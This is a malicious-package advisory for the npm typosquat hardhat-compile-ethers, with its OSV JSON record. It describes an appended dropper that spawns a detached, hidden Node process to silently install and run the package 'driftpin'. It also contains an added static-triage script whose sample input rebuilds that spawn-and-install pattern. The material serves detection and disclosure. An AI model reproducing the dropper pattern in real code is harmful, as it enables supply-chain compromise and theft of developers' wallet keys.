mal-2026-6705
Vulnerability from ossf_malicious_packages
Published
2026-07-01 18:41
Modified
2026-07-01 19:13
Summary
Malicious code in hardhat-compile-ethers (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)

The package's main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user's config), it spawns a detached Node child (spawn(process.execPath, ['-e', code], {detached:true, stdio:'ignore', windowsHide:true})) that runs a base64-decoded command to silently npm install driftpin --no-save --silent --no-audit --no-fund, then requires 'driftpin' and invokes getPlugin()(), executing attacker-controlled code in the installer's Node process. Both the shell command and the module name 'driftpin' are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, console window hidden on Windows) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and appears only in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.
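
The indicators listed above (a detached, output-suppressed child spawned from process.execPath, base64 literals that decode to an install command, and child-process code present in the compiled dist file but not in the TypeScript source) can be checked statically before a package is loaded. The following Node script is an added triage example, not code from the advisory, from Amazon Inspector or from the package; the sample dist and source strings it scans are constructed here with a placeholder module name, and the function names are this example's own.

```javascript
"use strict";
// Added example: static triage of a compiled npm entry file for the
// dropper pattern described in the advisory. Nothing here executes the
// scanned code; it only reads it as text.

// Quoted base64-looking literals long enough to carry a command. Short
// tokens (option names, short ids) are ignored to cut noise.
const BASE64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;

// Decode each candidate literal and keep the ones that decode to printable
// text mentioning a package-manager install or a require(). Hex digests and
// other long literals decode to binary garbage and are dropped by the
// printable-text check, which is the main false-positive source.
function suspiciousBase64Literals(source) {
  const hits = [];
  for (const m of source.matchAll(BASE64_LITERAL)) {
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    if (!/^[\x20-\x7e\s]+$/.test(decoded)) continue; // not text
    if (/\b(npm|yarn|pnpm)\s+(i|install|add)\b|require\s*\(/.test(decoded)) {
      hits.push(decoded);
    }
  }
  return hits;
}

// True when a child is spawned from the running Node binary with the
// evasion options the advisory lists: detached plus silenced stdio or a
// hidden Windows console window.
function hasDetachedSelfSpawn(source) {
  const spawnsNode = /spawn\s*\(\s*process\.execPath/.test(source);
  const detached = /detached\s*:\s*true/.test(source);
  const silenced = /stdio\s*:\s*['"]ignore['"]/.test(source);
  const hidden = /windowsHide\s*:\s*true/.test(source);
  return spawnsNode && detached && (silenced || hidden);
}

// Process-creation tokens that appear in dist but nowhere in src. A compiled
// artifact should not gain child_process usage its source lacks; that gap is
// the post-build injection signal the advisory points to.
function distOnlyProcessCalls(distSource, tsSource) {
  const tokens = ["child_process", "spawn(", "spawnSync(", "exec(", "execSync("];
  return tokens.filter((t) => distSource.includes(t) && !tsSource.includes(t));
}

// Combine the three checks into one verdict for a dist/src pair.
function triage(distSource, tsSource) {
  const findings = {
    detachedSelfSpawn: hasDetachedSelfSpawn(distSource),
    decodedLiterals: suspiciousBase64Literals(distSource),
    distOnlyCalls: distOnlyProcessCalls(distSource, tsSource),
  };
  const flagged =
    findings.detachedSelfSpawn ||
    findings.decodedLiterals.length > 0 ||
    findings.distOnlyCalls.length > 0;
  findings.verdict = flagged ? "suspicious" : "clean";
  return findings;
}

// Constructed sample input (placeholder module name, not the real payload):
// the TypeScript source a plugin was supposedly built from, and a compiled
// entry whose tail carries the indicators as an appended block.
const SAMPLE_TS = 'export function compile(hre) { return hre.run("compile"); }\n';
const ENCODED_CMD = Buffer.from(
  "npm install placeholder-dropper --no-save --silent"
).toString("base64");
const SAMPLE_DIST =
  '"use strict";\nexports.compile = (hre) => hre.run("compile");\n' +
  'const { spawn } = require("child_process");\n' +
  `const cmd = Buffer.from("${ENCODED_CMD}", "base64").toString();\n` +
  'spawn(process.execPath, ["-e", cmd], { detached: true, stdio: "ignore", windowsHide: true }).unref();\n';

console.log(JSON.stringify(triage(SAMPLE_DIST, SAMPLE_TS), null, 2));
```

Run it against a real install by reading the package's published entry file and its checked-in source into the two strings; a "suspicious" verdict is a reason to inspect the decoded literals and the dist-only calls by hand, not a proof of compromise on its own, since build tooling can legitimately add helper code to dist.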

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "dist/src/index.js",
              "sha256": "7de1080e1a3fdcfcedbe49bc8d587fb856f3bfc06d8bdc1750f40228fcf45f61",
              "tlsh": "e751e2a32797a1302b370fadcb0b1c5663a352932ad891a0f7ed95121f8218951b39c9"
            },
            {
              "path": "package.json",
              "sha256": "d5cdd23b692a6e0a213c2a889a398195837f2033e748241c69dee5257beb6dd1",
              "tlsh": "41318960cc19cd2307d85595ac7a429361649a470ca6fc2c73a52bbf4f0c2af21b9abd"
            }
          ],
          "package_integrity": [
            {
              "filename": "hardhat-compile-ethers-0.4.7.tgz",
              "hashes": {
                "sha1": "e718d781b11897329c9747c5fd57a1677ea24110",
                "sha512_sri": "sha512-jZX1Kng+W6pbRo0AaYeOa9T9Pw2I3jfP4IS+VPjc2btcfG4qr4IH9o6J352wbyVbVrWO0XDDpb8FfJTaADBneg=="
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "hardhat-compile-ethers"
      },
      "versions": [
        "0.4.7",
        "0.4.10",
        "0.4.12",
        "0.4.11",
        "0.4.8",
        "0.4.6",
        "0.4.5",
        "0.4.4",
        "0.4.2",
        "0.4.0",
        "0.4.3",
        "0.0.1",
        "0.4.9"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007865",
        "import_time": "2026-07-01T19:11:25.632444026Z",
        "modified_time": "2026-07-01T18:42:56Z",
        "sha256": "180936274762437e2311a83f716cbbf9fcaaaef8e194b950bfa28192bfb44bf8",
        "source": "amazon-inspector",
        "versions": [
          "0.4.7"
        ]
      },
      {
        "id": "IN-MAL-2026-007863",
        "import_time": "2026-07-01T19:11:25.404233578Z",
        "modified_time": "2026-07-01T18:42:38Z",
        "sha256": "2852e841d953072a439342e58a63f91a6f4047c122d337ad57bc4f4adad45f81",
        "source": "amazon-inspector",
        "versions": [
          "0.4.10"
        ]
      },
      {
        "id": "IN-MAL-2026-007856",
        "import_time": "2026-07-01T19:11:24.475165466Z",
        "modified_time": "2026-07-01T18:41:35Z",
        "sha256": "3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1",
        "source": "amazon-inspector",
        "versions": [
          "0.4.12"
        ]
      },
      {
        "id": "IN-MAL-2026-007861",
        "import_time": "2026-07-01T19:11:25.142169343Z",
        "modified_time": "2026-07-01T18:42:18Z",
        "sha256": "51a9a1265ba62d0c900be1a70b6fb28386f2e25cc3e31855fc5b3f58530cae47",
        "source": "amazon-inspector",
        "versions": [
          "0.4.11"
        ]
      },
      {
        "id": "IN-MAL-2026-007864",
        "import_time": "2026-07-01T19:11:25.528163378Z",
        "modified_time": "2026-07-01T18:42:46Z",
        "sha256": "70318ad0a21e7e2e412adfb362788a771ff49831a01481de94c60d7903634f36",
        "source": "amazon-inspector",
        "versions": [
          "0.4.8"
        ]
      },
      {
        "id": "IN-MAL-2026-007866",
        "import_time": "2026-07-01T19:11:25.775808651Z",
        "modified_time": "2026-07-01T18:43:07Z",
        "sha256": "95bb3eefd23fcfaf7a9da242c86085f6b7d1cda8344a82a8219789beefe60c12",
        "source": "amazon-inspector",
        "versions": [
          "0.4.6"
        ]
      },
      {
        "id": "IN-MAL-2026-007870",
        "import_time": "2026-07-01T19:11:26.226038725Z",
        "modified_time": "2026-07-01T18:43:43Z",
        "sha256": "a1d54b1992fb2f6fa590ca2b76dd65574a18a0659f43294aa2fdf0588abe4062",
        "source": "amazon-inspector",
        "versions": [
          "0.4.5"
        ]
      },
      {
        "id": "IN-MAL-2026-007869",
        "import_time": "2026-07-01T19:11:26.129866344Z",
        "modified_time": "2026-07-01T18:43:34Z",
        "sha256": "d572224fcf90c82c0626008128d7a1fd790e480ec4c3b4fa5292eeb3d610bf81",
        "source": "amazon-inspector",
        "versions": [
          "0.4.4"
        ]
      },
      {
        "id": "IN-MAL-2026-007867",
        "import_time": "2026-07-01T19:11:25.903639151Z",
        "modified_time": "2026-07-01T18:43:17Z",
        "sha256": "dee0fafd7c2ba309f9b3b1ae8f7e4d54c9d82c630bdbaa176044b9e054cf08c9",
        "source": "amazon-inspector",
        "versions": [
          "0.4.2"
        ]
      },
      {
        "id": "IN-MAL-2026-007872",
        "import_time": "2026-07-01T19:11:26.500370955Z",
        "modified_time": "2026-07-01T18:43:59Z",
        "sha256": "55a890434cfd92fb846ba508acebf110f286a083dc029651ebecb781528e6f39",
        "source": "amazon-inspector",
        "versions": [
          "0.4.0"
        ]
      },
      {
        "id": "IN-MAL-2026-007868",
        "import_time": "2026-07-01T19:11:26.029254479Z",
        "modified_time": "2026-07-01T18:43:25Z",
        "sha256": "845a969efc54f4b45826b4bd051aa1adea7c2a983ce97e0665e0c7107f4f2ce3",
        "source": "amazon-inspector",
        "versions": [
          "0.4.3"
        ]
      },
      {
        "id": "IN-MAL-2026-007871",
        "import_time": "2026-07-01T19:11:26.358013817Z",
        "modified_time": "2026-07-01T18:43:50Z",
        "sha256": "c807ea26446e2a048c154c7a3c035c22db3c42ceede57a307195256a3f11e540",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007862",
        "import_time": "2026-07-01T19:11:25.289124822Z",
        "modified_time": "2026-07-01T18:42:31Z",
        "sha256": "d1e4d2af59e7b9e792f78d9335e437080b45295155a778e9d336e23f809e325f",
        "source": "amazon-inspector",
        "versions": [
          "0.4.9"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (3bb9781577ff17698d2cb66a6cd832fe8bdda014b30c0c662055a45d42801ac1)\nThe package\u0027s main entry dist/src/index.js contains a payload appended after the legitimate Hardhat exports. On require/import (e.g. when Hardhat loads the user\u0027s config), it spawns a detached Node child (`spawn(process.execPath, [\u0027-e\u0027, code], {detached:true, stdio:\u0027ignore\u0027, windowsHide:true})`) that runs a base64-decoded command to silently `npm install driftpin --no-save --silent --no-audit --no-fund`, then `require(\u0027driftpin\u0027)` and invoke `getPlugin()()`, executing attacker-controlled code in the installer\u0027s Node process. Both the shell command and the module name \u0027driftpin\u0027 are base64-encoded to hide them from casual inspection, and the spawn options (detached, stdio ignored, windows window hidden) are evasion mechanics. The payload is absent from the TypeScript source (src/index.ts) and only appears in the published dist artifact, indicating post-build injection. The package name mimics legitimate Hardhat/ethers plugins (e.g. @nomicfoundation/hardhat-ethers, hardhat-deploy-ethers) and the README is copied from wighawag/hardhat-deploy, making this a typosquat that delivers a dependency-chain dropper. Installers are typically Hardhat development machines that hold wallet keys and signing material, making arbitrary code execution on import especially damaging.\n",
  "id": "MAL-2026-6705",
  "modified": "2026-07-01T19:13:18Z",
  "published": "2026-07-01T18:41:35Z",
  "references": [
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.7"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.10"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.12"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.11"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.8"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.6"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.5"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.4"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.2"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.0"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.0.1"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/hardhat-compile-ethers/v/0.4.9"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in hardhat-compile-ethers (npm)"
}